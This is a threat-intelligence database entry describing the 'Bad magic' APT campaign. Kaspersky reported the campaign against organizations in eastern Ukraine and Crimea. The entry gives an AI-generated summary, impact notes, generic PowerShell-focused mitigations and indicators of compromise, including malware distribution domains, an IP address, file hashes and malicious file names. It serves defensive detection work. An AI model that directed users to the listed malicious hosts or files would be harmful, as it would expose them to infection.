OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict
OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict
AI Analysis
Technical Summary
The reported threat concerns a newly identified Advanced Persistent Threat (APT) group operating in the context of the Russo-Ukrainian conflict. This APT, referred to as 'Bad magic,' has been detected through open-source intelligence (OSINT) efforts and is characterized by its use of PowerShell scripting (MITRE ATT&CK T1059.001) for payload delivery and network activity. The campaign appears to be focused on leveraging PowerShell to execute malicious code, which is a common technique for stealthy command and control and lateral movement within compromised networks. Although specific affected software versions or vulnerabilities are not detailed, the threat is linked to geopolitical tensions in Ukraine and surrounding regions, suggesting a targeted espionage or sabotage motive. The analysis confidence is moderate, with a threat level rated as low by the source, and no known exploits or patches are currently available. The lack of detailed technical indicators or exploits in the wild implies that the threat is either emerging or under active investigation. The campaign's use of PowerShell indicates a preference for living-off-the-land techniques, which complicates detection and mitigation efforts. Overall, this APT represents a persistent and evolving threat actor leveraging scripting and network-based tactics in a high-conflict geopolitical environment.
Potential Impact
For European organizations, especially those with ties to Ukraine or involved in sectors relevant to the Russo-Ukrainian conflict (such as government, defense, critical infrastructure, and diplomatic entities), this APT poses a risk of espionage, data exfiltration, and potential disruption of services. The use of PowerShell-based payload delivery can lead to unauthorized access, lateral movement within networks, and potential compromise of sensitive information. While the current severity is assessed as low, the geopolitical context and the persistent nature of APTs mean that the impact could escalate if the threat actor refines their capabilities or expands targeting. Organizations in Europe may face indirect risks through supply chain attacks or targeting of diaspora communities and allied institutions. The stealthy nature of PowerShell attacks also increases the risk of prolonged undetected intrusions, which can undermine confidentiality and integrity of critical data and systems.
Mitigation Recommendations
European organizations should implement advanced PowerShell logging and monitoring to detect anomalous script execution, including enabling Script Block Logging and Module Logging in Windows environments. Employ application control policies such as AppLocker or Windows Defender Application Control to restrict unauthorized PowerShell usage. Network segmentation and strict access controls can limit lateral movement opportunities. Regular threat hunting activities focusing on PowerShell command patterns and unusual network connections should be conducted. Organizations should also ensure that endpoint detection and response (EDR) solutions are tuned to identify living-off-the-land techniques. Given the geopolitical context, enhanced collaboration with national cybersecurity centers and sharing of threat intelligence related to this APT is recommended. Employee awareness training about spear-phishing and social engineering tactics commonly used to initiate such campaigns is also critical. Finally, maintaining up-to-date backups and incident response plans tailored to APT scenarios will improve resilience against potential compromises.
Affected Countries
Ukraine, Poland, Germany, France, United Kingdom, Estonia, Lithuania, Latvia
Indicators of Compromise
- domain: webservice-srv.online
- domain: webservice-srv1.online
- ip: 185.166.217.184
- hash: 0a95a985e6be0918fdb4bfabf0847b5a
- hash: ecb7af5771f4fe36a3065dc4d5516d84
- hash: 765f45198cb8039079a28289eab761c5
- hash: ebaf3c6818bfc619ca2876abd6979f6d
- hash: 1032986517836a8b1f87db954722a33f
- hash: 1de44e8da621cdeb62825d367693c75e
- hash: 7c0e5627fd25c40374bc22035d3fadd8
- file: Overall.exe
- hash: 9e19fe5c3cf3e81f347dd78cf3c2e0c2
- file: Clean.exe
- hash: ce8d77af445e3a7c7e56a6ea53af8c0d
- file: All.exe
- hash: 1fe3a2502e330432f3cf37ca7acbffac
- hash: 8c2f5e7432f1e6ad22002991772d589b
- file: manutil.vbs
- hash: bec44b3194c78f6e858b1768c071c5db
- file: service_pack.dat
- hash: fee3db5db8817e82b1af4cedafd2f346
- file: attachment.msi
- link: https://securelist.com/bad-magic-apt/109087/
- text: Since the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions. In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.
- text: Blog
OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict
Description
OSINT - Bad magic: new APT found in the area of Russo-Ukrainian conflict
AI-Powered Analysis
Technical Analysis
The reported threat concerns a newly identified Advanced Persistent Threat (APT) group operating in the context of the Russo-Ukrainian conflict. This APT, referred to as 'Bad magic,' has been detected through open-source intelligence (OSINT) efforts and is characterized by its use of PowerShell scripting (MITRE ATT&CK T1059.001) for payload delivery and network activity. The campaign appears to be focused on leveraging PowerShell to execute malicious code, which is a common technique for stealthy command and control and lateral movement within compromised networks. Although specific affected software versions or vulnerabilities are not detailed, the threat is linked to geopolitical tensions in Ukraine and surrounding regions, suggesting a targeted espionage or sabotage motive. The analysis confidence is moderate, with a threat level rated as low by the source, and no known exploits or patches are currently available. The lack of detailed technical indicators or exploits in the wild implies that the threat is either emerging or under active investigation. The campaign's use of PowerShell indicates a preference for living-off-the-land techniques, which complicates detection and mitigation efforts. Overall, this APT represents a persistent and evolving threat actor leveraging scripting and network-based tactics in a high-conflict geopolitical environment.
Potential Impact
For European organizations, especially those with ties to Ukraine or involved in sectors relevant to the Russo-Ukrainian conflict (such as government, defense, critical infrastructure, and diplomatic entities), this APT poses a risk of espionage, data exfiltration, and potential disruption of services. The use of PowerShell-based payload delivery can lead to unauthorized access, lateral movement within networks, and potential compromise of sensitive information. While the current severity is assessed as low, the geopolitical context and the persistent nature of APTs mean that the impact could escalate if the threat actor refines their capabilities or expands targeting. Organizations in Europe may face indirect risks through supply chain attacks or targeting of diaspora communities and allied institutions. The stealthy nature of PowerShell attacks also increases the risk of prolonged undetected intrusions, which can undermine confidentiality and integrity of critical data and systems.
Mitigation Recommendations
European organizations should implement advanced PowerShell logging and monitoring to detect anomalous script execution, including enabling Script Block Logging and Module Logging in Windows environments. Employ application control policies such as AppLocker or Windows Defender Application Control to restrict unauthorized PowerShell usage. Network segmentation and strict access controls can limit lateral movement opportunities. Regular threat hunting activities focusing on PowerShell command patterns and unusual network connections should be conducted. Organizations should also ensure that endpoint detection and response (EDR) solutions are tuned to identify living-off-the-land techniques. Given the geopolitical context, enhanced collaboration with national cybersecurity centers and sharing of threat intelligence related to this APT is recommended. Employee awareness training about spear-phishing and social engineering tactics commonly used to initiate such campaigns is also critical. Finally, maintaining up-to-date backups and incident response plans tailored to APT scenarios will improve resilience against potential compromises.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Threat Level
- 3
- Analysis
- 1
- Uuid
- f3eda2d3-840b-46ba-ac74-50b68a58b0fe
- Original Timestamp
- 1679481690
Indicators of Compromise
Domain
Value | Description | Copy |
---|---|---|
domainwebservice-srv.online | Distribution servers | |
domainwebservice-srv1.online | Distribution servers |
Ip
Value | Description | Copy |
---|---|---|
ip185.166.217.184 | Distribution servers |
Hash
Value | Description | Copy |
---|---|---|
hash0a95a985e6be0918fdb4bfabf0847b5a | Lure archives | |
hashecb7af5771f4fe36a3065dc4d5516d84 | Lure archives | |
hash765f45198cb8039079a28289eab761c5 | Lure archives | |
hashebaf3c6818bfc619ca2876abd6979f6d | Lure archives | |
hash1032986517836a8b1f87db954722a33f | Lure archives | |
hash1de44e8da621cdeb62825d367693c75e | Lure archives | |
hash7c0e5627fd25c40374bc22035d3fadd8 | — | |
hash9e19fe5c3cf3e81f347dd78cf3c2e0c2 | CommonMagic cryptography module | |
hashce8d77af445e3a7c7e56a6ea53af8c0d | CommonMagic loader | |
hash1fe3a2502e330432f3cf37ca7acbffac | PowerMagic backdoor | |
hash8c2f5e7432f1e6ad22002991772d589b | PowerMagic loader | |
hashbec44b3194c78f6e858b1768c071c5db | PowerMagic dropper | |
hashfee3db5db8817e82b1af4cedafd2f346 | — |
File
Value | Description | Copy |
---|---|---|
fileOverall.exe | — | |
fileClean.exe | CommonMagic cryptography module | |
fileAll.exe | CommonMagic loader | |
filemanutil.vbs | PowerMagic loader | |
fileservice_pack.dat | PowerMagic dropper | |
fileattachment.msi | — |
Link
Value | Description | Copy |
---|---|---|
linkhttps://securelist.com/bad-magic-apt/109087/ | — |
Text
Value | Description | Copy |
---|---|---|
textSince the start of the Russo-Ukrainian conflict, Kaspersky researchers and the international community at large have identified a significant number of cyberattacks executed in a political and geopolitical context. We previously published an overview of cyber activities and the threat landscape related to the conflict between Russia and Ukraine and continue to monitor new threats in these regions.
In October 2022, we identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server. | — | |
textBlog | — |
Threat ID: 682acdbebbaf20d303f0e64a
Added to database: 5/19/2025, 6:20:46 AM
Last enriched: 7/9/2025, 12:24:58 AM
Last updated: 8/18/2025, 10:09:00 PM
Views: 10
Related Threats
Actions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.